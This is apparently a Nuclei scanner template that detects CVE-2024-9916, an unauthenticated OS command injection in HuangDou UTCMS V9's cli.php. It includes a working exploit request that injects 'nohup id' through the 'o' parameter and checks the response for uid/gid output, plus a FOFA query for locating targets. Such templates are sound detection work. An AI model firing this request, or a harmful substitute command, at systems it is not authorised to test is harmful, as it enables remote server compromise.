id: CVE-2024-9916

info:
  name: HuangDou UTCMS V9 - OS Command Injection
  author: iamnoooob,pdresearch
  severity: high
  description: |
    A vulnerability, which was classified as critical, has been found in HuangDou UTCMS V9. Affected by this issue is some unknown functionality of the file app/modules/ut-cac/admin/cli.php. The manipulation of the argument o leads to OS command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands on the server through command injection in the cli.php file, achieving complete system compromise and potential access to sensitive data.
  remediation: |
    Apply security patches from HuangDou for UTCMS V9 to address the OS command injection vulnerability in app/modules/ut-cac/admin/cli.php.
  reference:
    - https://vuldb.com/?ctiid.280244
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9916
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-9916
    cwe-id: CWE-78
    epss-score: 0.73666
    epss-percentile: 0.99402
    cpe: cpe:2.3:a:usualtool:usualtoolcms:9.0:*:*:*:*:*:*:*
  metadata:
    vendor: usualtool
    product: usualtoolcms
    verified: true
    max-request: 1
    fofa-query: body="usualtool"
  tags: cve,cve2024,huangdou,utc,rce,php,vkev,vuln

http:
  - raw:
      - |
        POST /app/modules/ut-cac/admin/cli.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        o=nohup id

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '~]#nohup id run complete.'
          - 'uid='
          - 'gid='
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008af10be97489293891451ac8e27cc827cf8e154403a82f7d8402106e5b15fcf0022100f20d6b6ad20f6cef28672d106a9303e2f3359fb4cae35155f07b8934353a2b52:922c64590222798bb761d5b6d8e72950